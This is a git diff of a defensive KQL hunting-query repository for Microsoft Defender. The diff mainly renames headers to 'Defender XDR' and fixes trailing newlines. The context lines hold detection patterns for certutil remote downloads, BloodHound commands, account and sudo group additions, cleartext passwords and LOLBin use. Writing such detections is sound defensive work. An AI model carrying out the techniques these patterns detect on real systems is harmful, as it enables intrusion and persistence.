+++ b/Defender For Cloud Apps/MaliciousEmailDeliveredInMailbox.md @@ -1,6 +1,6 @@ # Malicious email delivered in Microsoft 365 -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/MostImpersonatorsByAccount.md b/Defender For Cloud Apps/MostImpersonatorsByAccount.md index 44e10fe..2e6c44f 100644 --- a/Defender For Cloud Apps/MostImpersonatorsByAccount.md +++ b/Defender For Cloud Apps/MostImpersonatorsByAccount.md @@ -1,6 +1,6 @@ # List the top 10 accounts that have the most impersonators -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/OneDriveSyncFromRareIP.md b/Defender For Cloud Apps/OneDriveSyncFromRareIP.md index 31b0070..40e9587 100644 --- a/Defender For Cloud Apps/OneDriveSyncFromRareIP.md +++ b/Defender For Cloud Apps/OneDriveSyncFromRareIP.md @@ -52,4 +52,4 @@ CloudAppEvents // Filter if the activity happens in combination with a rare IP | join kind=inner EntraUserIPInfo on $left.AccountId == $right.UserId | project TimeGenerated, TotalEvents, BaseFolders, AccountId, AccountDisplayName, DeviceType, OSPlatform, IPAddress, IPEventCount -``` \ No newline at end of file +``` diff --git a/Defender For Cloud Apps/RiskyIPActivities.md b/Defender For Cloud Apps/RiskyIPActivities.md index 652ab3f..aad67ec 100644 --- a/Defender For Cloud Apps/RiskyIPActivities.md +++ b/Defender For Cloud Apps/RiskyIPActivities.md @@ -1,6 +1,6 @@ # Detect risky IP activities -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/SupressionRuleCreations.md b/Defender For Cloud Apps/SupressionRuleCreations.md index fb9f37c..4a09e5d 100644 --- a/Defender For Cloud Apps/SupressionRuleCreations.md +++ b/Defender For Cloud Apps/SupressionRuleCreations.md @@ -1,6 +1,6 @@ # Detect supression rule creations -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents 
diff --git a/Defender For Cloud Apps/Visualization - ActionsPerformed.md b/Defender For Cloud Apps/Visualization - ActionsPerformed.md index a6a7b0f..c12699b 100644 --- a/Defender For Cloud Apps/Visualization - ActionsPerformed.md +++ b/Defender For Cloud Apps/Visualization - ActionsPerformed.md @@ -1,6 +1,6 @@ # Visualisation of ActionTypes that have been seen in the Cloud App logs in the last 30 days -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/Visualization - HardDeletionsByUser.md b/Defender For Cloud Apps/Visualization - HardDeletionsByUser.md index 405e136..507c761 100644 --- a/Defender For Cloud Apps/Visualization - HardDeletionsByUser.md +++ b/Defender For Cloud Apps/Visualization - HardDeletionsByUser.md @@ -1,6 +1,6 @@ # Visualisation of the users with the most HardDelete actions performed -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/Visualization - OperationsPerformed.md b/Defender For Cloud Apps/Visualization - OperationsPerformed.md index 0f4f688..5c2f168 100644 --- a/Defender For Cloud Apps/Visualization - OperationsPerformed.md +++ b/Defender For Cloud Apps/Visualization - OperationsPerformed.md @@ -1,6 +1,6 @@ # Visualisation of operations that have been seen in the Cloud App logs in the last 30 days -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/Visualization - OutdatedOSUsed.md b/Defender For Cloud Apps/Visualization - OutdatedOSUsed.md index 5968286..1e33449 100644 --- a/Defender For Cloud Apps/Visualization - OutdatedOSUsed.md +++ b/Defender For Cloud Apps/Visualization - OutdatedOSUsed.md @@ -1,6 +1,6 @@ # Visualise the outdated Operating Systems used to connect to your cloud environment -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents 
diff --git a/Defender For Endpoint/AMSIScriptDetections.md b/Defender For Endpoint/AMSIScriptDetections.md index e091fdb..3887cc8 100644 --- a/Defender For Endpoint/AMSIScriptDetections.md +++ b/Defender For Endpoint/AMSIScriptDetections.md @@ -19,7 +19,7 @@ An adversary uses PowerShell to execute malicious scripts in which AMSI detects #### References - https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType == "AmsiScriptDetection" @@ -32,4 +32,4 @@ DeviceEvents | where ActionType == "AmsiScriptDetection" | extend Description = tostring(parse_json(AdditionalFields).Description) | project TimeGenerated, DeviceName, InitiatingProcessCommandLine, Description -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/ASR Rules/ASR-RulesTriggeredByDevice.md b/Defender For Endpoint/ASR Rules/ASR-RulesTriggeredByDevice.md index de1bde6..d6a0e4f 100644 --- a/Defender For Endpoint/ASR Rules/ASR-RulesTriggeredByDevice.md +++ b/Defender For Endpoint/ASR Rules/ASR-RulesTriggeredByDevice.md @@ -8,7 +8,7 @@ This query gives an overview of the amount of ASR triggers for each device. A hi #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType startswith "Asr" diff --git a/Defender For Endpoint/ASR Rules/AsrExecutableOfficeContent.md b/Defender For Endpoint/ASR Rules/AsrExecutableOfficeContent.md index 4691d14..7699194 100644 --- a/Defender For Endpoint/ASR Rules/AsrExecutableOfficeContent.md +++ b/Defender For Endpoint/ASR Rules/AsrExecutableOfficeContent.md 
@@ -21,7 +21,7 @@ A malcious Office Application has run and resulted in a attacker that gained Per #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-office-applications-from-creating-executable-content -## Defender For Endpoint +## Defender XDR ``` // To prevent False Positives a FilePrevalanceThreshold is used. let FilePrevalanceThreshold = 100; @@ -41,4 +41,4 @@ DeviceEvents // Enrich results with File information | invoke FileProfile('SHA1', 10000) | project TimeGenerated, DeviceName, InitiatingProcessAccountUpn, FileName, FolderPath, ActionType, SHA1, InitiatingProcessCommandLine, InitiatingProcessFolderPath -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/ASR Rules/AsrRansomware.md b/Defender For Endpoint/ASR Rules/AsrRansomware.md index b6a5d16..cd7aa13 100644 --- a/Defender For Endpoint/ASR Rules/AsrRansomware.md +++ b/Defender For Endpoint/ASR Rules/AsrRansomware.md @@ -17,7 +17,7 @@ A actor has gained access to your network and tries to execute ransomware. #### References - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#use-advanced-protection-against-ransomware -## Defender For Endpoint +## Defender XDR ```KQL DeviceEvents | where ingestion_time() > ago(30d) diff --git a/Defender For Endpoint/ASR Rules/Pivot - ASRConfig.md b/Defender For Endpoint/ASR Rules/Pivot - ASRConfig.md index b564596..66bd82e 100644 --- a/Defender For Endpoint/ASR Rules/Pivot - ASRConfig.md +++ b/Defender For Endpoint/ASR Rules/Pivot - ASRConfig.md 
@@ -8,7 +8,7 @@ This query returns a row for each device and states for every rule the configura #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` DeviceTvmInfoGathering | summarize arg_max(Timestamp, DeviceId, DeviceName, AdditionalFields) by DeviceId diff --git a/Defender For Endpoint/ASR Rules/Pivot - ASRTriggers.md b/Defender For Endpoint/ASR Rules/Pivot - ASRTriggers.md index 3ee91ee..9d4e126 100644 --- a/Defender For Endpoint/ASR Rules/Pivot - ASRTriggers.md +++ b/Defender For Endpoint/ASR Rules/Pivot - ASRTriggers.md @@ -8,7 +8,7 @@ This query returns a row for each device with a count for each Attack Surface Re #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType startswith 'ASR' diff --git a/Defender For Endpoint/AnomalousSMBSessionsCreated.md b/Defender For Endpoint/AnomalousSMBSessionsCreated.md index 1765ba3..75e6f71 100644 --- a/Defender For Endpoint/AnomalousSMBSessionsCreated.md +++ b/Defender For Endpoint/AnomalousSMBSessionsCreated.md @@ -14,7 +14,7 @@ This detection rule is aimed to detect a host that performs SMB Discovery by ale #### Risk A actor has gotten access to a system en performs a scan to identify possible lateral movement paths. -## Defender For Endpoint +## Defender XDR ```KQL DeviceNetworkEvents | where ingestion_time() > ago(1h) diff --git a/Defender For Endpoint/BloodHoundProcessDetection.md b/Defender For Endpoint/BloodHoundProcessDetection.md index c1ac745..08e1390 100644 --- a/Defender For Endpoint/BloodHoundProcessDetection.md +++ b/Defender For Endpoint/BloodHoundProcessDetection.md 
@@ -8,7 +8,7 @@ This query detects the use of bloodhound based on the processes it creates. This #### References - https://redcanary.com/threat-detection-report/threats/bloodhound/ -## Defender For Endpoint +## Defender XDR ``` // List with known bloodhound executions let BloodhoundCommands = dynamic(['-collectionMethod', 'invoke-bloodhound' ,'get-bloodHounddata']); diff --git a/Defender For Endpoint/CommandlineGroupAddition.md b/Defender For Endpoint/CommandlineGroupAddition.md index 925fd63..61e4dc5 100644 --- a/Defender For Endpoint/CommandlineGroupAddition.md +++ b/Defender For Endpoint/CommandlineGroupAddition.md @@ -11,7 +11,7 @@ An attacker got access to a system and added an account to a group. #### References - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 -## Defender For Endpoint +## Defender XDR ```KQL // Source Sensitive Groups: https://techcommunity.microsoft.com/t5/security-compliance-and-identity/alert-when-a-group-is-added-to-a-sensitive-active-directory/ba-p/3436868 let SensitiveGroupName = pack_array( // Declare Sensitive Group names. Add any groups that you manually tagged as sensitive @@ -64,4 +64,4 @@ DeviceProcessEvents | where ProcessCommandLine has_all ("add", "group") | extend GroupIsSentitive = iff(ProcessCommandLine has_any (SensitiveGroupName), 1, 0) | project TimeGenerated, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, GroupIsSentitive -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/CommandlineUserAddition.md b/Defender For Endpoint/CommandlineUserAddition.md index 17fced9..759a69c 100644 --- a/Defender For Endpoint/CommandlineUserAddition.md +++ b/Defender For Endpoint/CommandlineUserAddition.md 
@@ -21,7 +21,7 @@ An attacker got access to a system and created an account for persitence. #### References - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 -## Defender For Endpoint +## Defender XDR ```KQL DeviceProcessEvents | where FileName in ("net.exe", "net1.exe") @@ -34,4 +34,4 @@ DeviceProcessEvents | where FileName in ("net.exe", "net1.exe") | where ProcessCommandLine has_all ("add", "user") | project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/CommandlineWithClearTextPassword.md b/Defender For Endpoint/CommandlineWithClearTextPassword.md index b16acac..45e5484 100644 --- a/Defender For Endpoint/CommandlineWithClearTextPassword.md +++ b/Defender For Endpoint/CommandlineWithClearTextPassword.md @@ -16,7 +16,7 @@ To limit false positives a filter can be used to only filter if both a username #### Risk Cleartext passwords can be logged and used by attackers to gain access to accounts. -## Defender For Endpoint +## Defender XDR ```KQL DeviceProcessEvents | where ProcessCommandLine has_all ("-password", "*") @@ -35,4 +35,4 @@ DeviceProcessEvents //| where isnotempty(UserName) | summarize TotalExecutions = count(), UniqueCommands = dcount(ProcessCommandLine), CommandLines = make_set(ProcessCommandLine, 1000), UniqueUsers = dcount(UserName), UserNames = make_set(UserName) by DeviceName | sort by UniqueUsers, UniqueCommands, TotalExecutions -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/DefenderDiscoveryActivities.md b/Defender For Endpoint/DefenderDiscoveryActivities.md index 56cc755..6f004db 100644 --- a/Defender For Endpoint/DefenderDiscoveryActivities.md +++ b/Defender For Endpoint/DefenderDiscoveryActivities.md 
@@ -20,7 +20,7 @@ Adversaries can use Get-MpPreference to list exclusions, those exclusions can be - https://learn.microsoft.com/en-us/powershell/module/defender/get-mppreference?view=windowsserver2022-ps - https://cloudbrothers.info/en/create-persistent-defender-av-exclusions-circumvent-defender-endpoint-detection/ -## Defender For Endpoint +## Defender XDR ```KQL let ProcessBased = DeviceProcessEvents | where ProcessCommandLine has "Get-MpPreference" @@ -47,4 +47,4 @@ let EventBased = DeviceEvents | extend Table = "DeviceEvents" | project-reorder Table, TimeGenerated, DeviceName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, ScriptLocation; union ProcessBased, EventBased -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Detect_Known_RAT_RMM_Process_Patterns.md b/Defender For Endpoint/Detect_Known_RAT_RMM_Process_Patterns.md index 32381e1..7ec0d25 100644 --- a/Defender For Endpoint/Detect_Known_RAT_RMM_Process_Patterns.md +++ b/Defender For Endpoint/Detect_Known_RAT_RMM_Process_Patterns.md @@ -28,7 +28,7 @@ The results will contain a summary table, listint the following columns: Unique - [RATs Race: Detecting remote access tools beyond pattern-based indicators](https://detect.fyi/rats-race-detecting-remote-access-tools-beyond-pattern-based-indicators-5c864b171892) -## Defender For Endpoint +## Defender XDR ```KQL // Author: Alex Teixeira (alex@opstune.com) DeviceProcessEvents diff --git a/Defender For Endpoint/DevicesWithMostSMBConnections.md b/Defender For Endpoint/DevicesWithMostSMBConnections.md index 435e8df..280838b 100644 --- a/Defender For Endpoint/DevicesWithMostSMBConnections.md +++ b/Defender For Endpoint/DevicesWithMostSMBConnections.md 
@@ -5,7 +5,7 @@ #### Description This hunting query lists all the devices and the unique connections they have made with a remote SMB port. Devices with a large number of connected SMB sessions can be interesting to investigate. -## Defender For Endpoint +## Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/DevicesWithTheMostSMBSessions.md b/Defender For Endpoint/DevicesWithTheMostSMBSessions.md index 4f5c257..a67ea0b 100644 --- a/Defender For Endpoint/DevicesWithTheMostSMBSessions.md +++ b/Defender For Endpoint/DevicesWithTheMostSMBSessions.md @@ -5,7 +5,7 @@ #### Description List all devices with the amount of SMB sessions they have. -## Defender For Endpoint +## Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days diff --git a/Defender For Endpoint/Discovery - DatabaseServices.md b/Defender For Endpoint/Discovery - DatabaseServices.md index 789d5f7..eb41bef 100644 --- a/Defender For Endpoint/Discovery - DatabaseServices.md +++ b/Defender For Endpoint/Discovery - DatabaseServices.md @@ -27,7 +27,7 @@ An adversary has gained access into your network and tries to find lateral movem - https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf - https://securelist.com/malicious-tasks-in-ms-sql-server/92167/ -## Defender For Endpoint +## Defender XDR ```KQL let DatabasePorts = dynamic([1433, 1434, 1583, 3050, 3306, 3351, 5432]); // Device List with devices that perform benign connections to SQL machines diff --git a/Defender For Endpoint/ExecutableFilesPublicFolder.md b/Defender For Endpoint/ExecutableFilesPublicFolder.md index ecb0e02..ee9ebf7 100644 --- a/Defender For Endpoint/ExecutableFilesPublicFolder.md +++ b/Defender For Endpoint/ExecutableFilesPublicFolder.md 
@@ -16,7 +16,7 @@ An adversary creates payloads in the C:\Users\Public to stay undetected. - https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-203a - https://securelist.com/server-side-attacks-cc-in-public-clouds-mdr-cases/107826/ -## Defender For Endpoint +## Defender XDR ``` // The start of the folderpath in the Public directory. let PublicFolder = @'C:\Users\Public'; @@ -47,4 +47,4 @@ DeviceFileEvents | extend FileExtension = tostring(extract(@'.*\.(.*)', 1, FileName)) // Only list Files that are executable | where FileExtension in~ (ExecutableFileExtensions) -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/ExploitGuardNetworkProtection.md b/Defender For Endpoint/ExploitGuardNetworkProtection.md index 687671c..c92c11b 100644 --- a/Defender For Endpoint/ExploitGuardNetworkProtection.md +++ b/Defender For Endpoint/ExploitGuardNetworkProtection.md @@ -12,7 +12,7 @@ A user has accessed (or tried to access) a malicious website. If the Exploit Gua - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/network-protection?view=o365-worldwide#advanced-hunting - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/manage-indicators?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType in~ ('ExploitGuardNetworkProtectionBlocked', 'ExploitGuardNetworkProtectionAudited') @@ -45,4 +45,4 @@ DeviceEvents RemoteUrl, ResponseCategory, DisplayName -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/HTTPDownloadsByFileExtention.md b/Defender For Endpoint/HTTPDownloadsByFileExtention.md index bb03c43..90a08e8 100644 --- a/Defender For Endpoint/HTTPDownloadsByFileExtention.md +++ b/Defender For Endpoint/HTTPDownloadsByFileExtention.md @@ -1,6 +1,6 @@ # List the file extentions that have been used during a HTTP GET request ---- -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents 
diff --git a/Defender For Endpoint/HTTPExecutableFilesDownloaded.md b/Defender For Endpoint/HTTPExecutableFilesDownloaded.md index ddeb0e2..c3f22d4 100644 --- a/Defender For Endpoint/HTTPExecutableFilesDownloaded.md +++ b/Defender For Endpoint/HTTPExecutableFilesDownloaded.md @@ -1,6 +1,6 @@ # Executable File Extentions downloaded via HTTP GET ---- -### Defender For Endpoint +### Defender XDR ``` let ExecutableFileExtentions = dynamic(['bat', 'cmd', 'com', 'cpl', 'ex', 'exe', 'jse', 'lnk','msc', 'ps1', 'reg', 'vb', 'vbe', 'ws', 'wsf']); diff --git a/Defender For Endpoint/HTTPRequestMethodsStatistics.md b/Defender For Endpoint/HTTPRequestMethodsStatistics.md index d8734a2..f9cd5a4 100644 --- a/Defender For Endpoint/HTTPRequestMethodsStatistics.md +++ b/Defender For Endpoint/HTTPRequestMethodsStatistics.md @@ -1,6 +1,6 @@ # HTTP Request Methods Statistics ---- -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/LatestAntivirusScanStatus.md b/Defender For Endpoint/LatestAntivirusScanStatus.md index b4053db..c4b359a 100644 --- a/Defender For Endpoint/LatestAntivirusScanStatus.md +++ b/Defender For Endpoint/LatestAntivirusScanStatus.md @@ -11,7 +11,7 @@ The Defender sensor is not working corretly and might not be able to idenfity su #### References - https://cloudbrothers.info/antivirus-scan-complete/ -## Defender For Endpoint +## Defender XDR ```KQL DeviceEvents | where ActionType == "AntivirusScanCompleted" @@ -34,4 +34,4 @@ DeviceEvents // Filter only devices that have not performed a antivirus scan in the last day | where DaysAgo > 0 | sort by DaysAgo -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Linux/Linux - UsersAddedToSudoersGroup.md b/Defender For Endpoint/Linux/Linux - UsersAddedToSudoersGroup.md index 74ed83f..9341e6d 100644 --- a/Defender For Endpoint/Linux/Linux - UsersAddedToSudoersGroup.md +++ b/Defender For Endpoint/Linux/Linux - UsersAddedToSudoersGroup.md 
@@ -14,7 +14,7 @@ This query allows you to hunt for users that have been added to the sudo group. #### Risk A advasary adds itself to the sudoers group and can perform actions with root privileges. -## Defender For Endpoint +## Defender XDR ``` let Commands = dynamic([@"usermod -aG sudo", @"usermod -a -G sudo"]); diff --git a/Defender For Endpoint/ListTamperingAttempts.md b/Defender For Endpoint/ListTamperingAttempts.md index d190406..ba33d67 100644 --- a/Defender For Endpoint/ListTamperingAttempts.md +++ b/Defender For Endpoint/ListTamperingAttempts.md @@ -11,7 +11,7 @@ An adversary tries to disable security logging / monitoring to perform malicious #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType == "TamperingAttempt" @@ -24,4 +24,4 @@ DeviceEvents | where ActionType == "TamperingAttempt" | extend TamperingAction = tostring(parse_json(AdditionalFields).TamperingAction), Status = tostring(parse_json(AdditionalFields).Status), Target = tostring(parse_json(AdditionalFields).Target) | summarize TotalActions = count(), Actions = make_set(TamperingAction), Targets = make_set(Target), RegistryNames = make_set(RegistryValueName), InitatingCommandLine = make_set(InitiatingProcessCommandLine) by DeviceName -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Living Off The Land/CertutilRemoteDownload.md b/Defender For Endpoint/Living Off The Land/CertutilRemoteDownload.md index 14b5006..0502c7f 100644 --- a/Defender For Endpoint/Living Off The Land/CertutilRemoteDownload.md +++ b/Defender For Endpoint/Living Off The Land/CertutilRemoteDownload.md 
@@ -24,7 +24,7 @@ An adversary transfered tools to the local device for execution. - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 -## Defender For Endpoint +## Defender XDR ```KQL DeviceProcessEvents | where FileName == "certutil.exe" @@ -37,4 +37,4 @@ DeviceProcessEvents | where FileName == "certutil.exe" | where tolower(ProcessCommandLine) has_all ("http", "urlcache", "-f") | project-reorder TimeGenerated, ProcessCommandLine, FileName, InitiatingProcessAccountUpn -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Living Off The Land/LOLBinRemoteIPCommandLine.md b/Defender For Endpoint/Living Off The Land/LOLBinRemoteIPCommandLine.md index c3ecf71..1c83433 100644 --- a/Defender For Endpoint/Living Off The Land/LOLBinRemoteIPCommandLine.md +++ b/Defender For Endpoint/Living Off The Land/LOLBinRemoteIPCommandLine.md 
@@ -8,7 +8,7 @@ This query returns all LOLbins that refer to a remote IP in the commandline. The #### References - https://lolbas-project.github.io/ -## Defender For Endpoint +## Defender XDR ```KQL let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; let LOLBins = dynamic(["AppInstaller.exe", "cmd.exe", "Aspnet_Compiler.exe", "At.exe", "Atbroker.exe", "Bash.exe", "Bitsadmin.exe", "CertOC.exe", "CertReq.exe", "Certutil.exe", "Cmdkey.exe", "cmdl32.exe", "Cmstp.exe", "ConfigSecurityPolicy.exe", "Conhost.exe", "Control.exe", "Csc.exe", "Cscript.exe", "CustomShellHost.exe", "DataSvcUtil.exe", "Desktopimgdownldr.exe", "DeviceCredentialDeployment.exe", "Dfsvc.exe", "Diantz.exe", "Diskshadow.exe", "Dnscmd.exe", "Esentutl.exe", "Eventvwr.exe", "Expand.exe", "Explorer.exe", "Extexport.exe", "Extrac32.exe", "Findstr.exe", "Finger.exe", "fltMC.exe", "Forfiles.exe", "Ftp.exe", "Gpscript.exe", "Hh.exe", "IMEWDBLD.exe", "Ie4uinit.exe", "Ieexec.exe", "Ilasm.exe", "Infdefaultinstall.exe", "Installutil.exe", "Jsc.exe", "Ldifde.exe", "Makecab.exe", "Mavinject.exe", "Msedge.exe", "Microsoft.Workflow.Compiler.exe", "Mmc.exe", "MpCmdRun.exe", "Msbuild.exe", "Msconfig.exe", "Msdt.exe", "Mshta.exe", "Msiexec.exe", "Netsh.exe", "Odbcconf.exe", "OfflineScannerShell.exe", "OneDriveStandaloneUpdater.exe", "Pcalua.exe", "Pcwrun.exe", "Pktmon.exe", "Pnputil.exe", "Presentationhost.exe", "Print.exe", "PrintBrm.exe", "Psr.exe", "Rasautou.exe", "rdrleakdiag.exe", "Reg.exe", "Regasm.exe", "Regedit.exe", "Regini.exe", "Register-cimprovider.exe", "Regsvcs.exe", "Regsvr32.exe", "Replace.exe", "Rpcping.exe", "Rundll32.exe", "Runexehelper.exe", "Runonce.exe", "Runscripthelper.exe", "Sc.exe", "Schtasks.exe", "Scriptrunner.exe", "Setres.exe", "SettingSyncHost.exe", "Stordiag.exe", "SyncAppvPublishingServer.exe", "Ttdinject.exe", "Tttracer.exe", "Unregmp2.exe", "vbc.exe", "Verclsid.exe", "Wab.exe", "winget.exe", "Wlrmdr.exe", "Wmic.exe", "WorkFolders.exe", "Wscript.exe", "Wsreset.exe", 
"wuauclt.exe", "Xwizard.exe", "fsutil.exe", "wt.exe", "GfxDownloadWrapper.exe", "Advpack.dll", "Desk.cpl", "Dfshim.dll", "Ieadvpack.dll", "Ieframe.dll", "Mshtml.dll", "Pcwutl.dll", "Setupapi.dll", "Shdocvw.dll", "Shell32.dll", "Syssetup.dll", "Url.dll", "Zipfldr.dll", "Comsvcs.dll", "AccCheckConsole.exe", "adplus.exe", "AgentExecutor.exe", "Appvlp.exe", "Bginfo.exe", "Cdb.exe", "coregen.exe", "Createdump.exe", "csi.exe", "DefaultPack.EXE", "Devinit.exe"]); diff --git a/Defender For Endpoint/Living Off The Land/LOLBinStatistics.md b/Defender For Endpoint/Living Off The Land/LOLBinStatistics.md index f88f8e4..6ca64ef 100644 --- a/Defender For Endpoint/Living Off The Land/LOLBinStatistics.md +++ b/Defender For Endpoint/Living Off The Land/LOLBinStatistics.md 
@@ -8,7 +8,7 @@ List the the statistics of LOLBINS that have been executed. Mostly the rare lolb #### References - https://lolbas-project.github.io/ -## Defender For Endpoint +## Defender XDR ``` let LOLBins = dynamic(["AppInstaller.exe", "Aspnet_Compiler.exe", "At.exe", "Atbroker.exe", "Bash.exe", "Bitsadmin.exe", "CertOC.exe", "CertReq.exe", "Certutil.exe", "Cmd.exe", "Cmdkey.exe", "cmdl32.exe", "Cmstp.exe", "ConfigSecurityPolicy.exe", "Conhost.exe", "Control.exe", "Csc.exe", "Cscript.exe", "CustomShellHost.exe", "DataSvcUtil.exe", "Desktopimgdownldr.exe", "DeviceCredentialDeployment.exe", "Dfsvc.exe", "Diantz.exe", "Diskshadow.exe", "Dnscmd.exe", "Esentutl.exe", "Eventvwr.exe", "Expand.exe", "Explorer.exe", "Extexport.exe", "Extrac32.exe", "Findstr.exe", "Finger.exe", "fltMC.exe", "Forfiles.exe", "Ftp.exe", "Gpscript.exe", "Hh.exe", "IMEWDBLD.exe", "Ie4uinit.exe", "Ieexec.exe", "Ilasm.exe", "Infdefaultinstall.exe", "Installutil.exe", "Jsc.exe", "Ldifde.exe", "Makecab.exe", "Mavinject.exe", "Msedge.exe", "Microsoft.Workflow.Compiler.exe", "Mmc.exe", "MpCmdRun.exe", "Msbuild.exe", "Msconfig.exe", "Msdt.exe", "Mshta.exe", "Msiexec.exe", "Netsh.exe", "Odbcconf.exe", "OfflineScannerShell.exe", "OneDriveStandaloneUpdater.exe", "Pcalua.exe", "Pcwrun.exe", "Pktmon.exe", "Pnputil.exe", "Presentationhost.exe", "Print.exe", "PrintBrm.exe", "Psr.exe", "Rasautou.exe", "rdrleakdiag.exe", "Reg.exe", "Regasm.exe", "Regedit.exe", "Regini.exe", "Register-cimprovider.exe", "Regsvcs.exe", "Regsvr32.exe", "Replace.exe", "Rpcping.exe", "Rundll32.exe", "Runexehelper.exe", "Runonce.exe", "Runscripthelper.exe", "Sc.exe", "Schtasks.exe", "Scriptrunner.exe", "Setres.exe", "SettingSyncHost.exe", "Stordiag.exe", "SyncAppvPublishingServer.exe", "Ttdinject.exe", "Tttracer.exe", "Unregmp2.exe", "vbc.exe", "Verclsid.exe", "Wab.exe", "winget.exe", "Wlrmdr.exe", "Wmic.exe", "WorkFolders.exe", "Wscript.exe", "Wsreset.exe", "wuauclt.exe", "Xwizard.exe", "fsutil.exe", "wt.exe", 
"GfxDownloadWrapper.exe", "Advpack.dll", "Desk.cpl", "Dfshim.dll", "Ieadvpack.dll", "Ieframe.dll", "Mshtml.dll", "Pcwutl.dll", "Setupapi.dll", "Shdocvw.dll", "Shell32.dll", "Syssetup.dll", "Url.dll", "Zipfldr.dll", "Comsvcs.dll", "AccCheckConsole.exe", "adplus.exe", "AgentExecutor.exe", "Appvlp.exe", "Bginfo.exe", "Cdb.exe", "coregen.exe", "Createdump.exe", "csi.exe", "DefaultPack.EXE", "Devinit.exe"]); DeviceProcessEvents diff --git a/Defender For Endpoint/Living Off The Land/LOLDriverUsage.md b/Defender For Endpoint/Living Off The Land/LOLDriverUsage.md index ed0fed5..441a589 100644 --- a/Defender For Endpoint/Living Off The Land/LOLDriverUsage.md +++ b/Defender For Endpoint/Living Off The Land/LOLDriverUsage.md @@ -11,7 +11,7 @@ An adversary uses a loldriver to perform malicious activities. #### References - https://www.loldrivers.io/ -## Defender For Endpoint +## Defender XDR ``` let LolDriverSHA1 = externaldata(SHA1: string)[@"https://raw.githubusercontent.com/magicsword-io/LOLDrivers/main/detections/hashes/authentihash_samples.sha1"] with (format="txt", ignoreFirstRecord=False); // Combine results to get ImageLoads, FileActions and Process Events diff --git a/Defender For Endpoint/Living Off The Land/LOTSUsage.md b/Defender For Endpoint/Living Off The Land/LOTSUsage.md index a244413..61609f9 100644 --- a/Defender For Endpoint/Living Off The Land/LOTSUsage.md +++ b/Defender For Endpoint/Living Off The Land/LOTSUsage.md @@ -18,7 +18,7 @@ An actor uses Living Off Trusted Sites to host their malicious infrastructure - https://lots-project.com/ -## Defender For Endpoint +## Defender XDR ``` // THIS QUERY IS ONLY FOR HUNTING, NOT FOR DETECTION. IT WILL GENERATE TO MUCH FPs. // The query levarages the Living Off Trusted Sites from: https://lots-project.com/ 
@@ -103,4 +103,4 @@ DeviceNetworkEvents | sort by TotalCount // Project all fields | project Domain, TotalCount, UniqueURLs, TotalDevices, TotalInitiatingFiles, RemotePorts, URLs, Devices, InitiatingFiles -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Living Off The Land/NewLOLBinExternalConnection.md b/Defender For Endpoint/Living Off The Land/NewLOLBinExternalConnection.md index 8d5e3d8..0486bb2 100644 --- a/Defender For Endpoint/Living Off The Land/NewLOLBinExternalConnection.md +++ b/Defender For Endpoint/Living Off The Land/NewLOLBinExternalConnection.md 
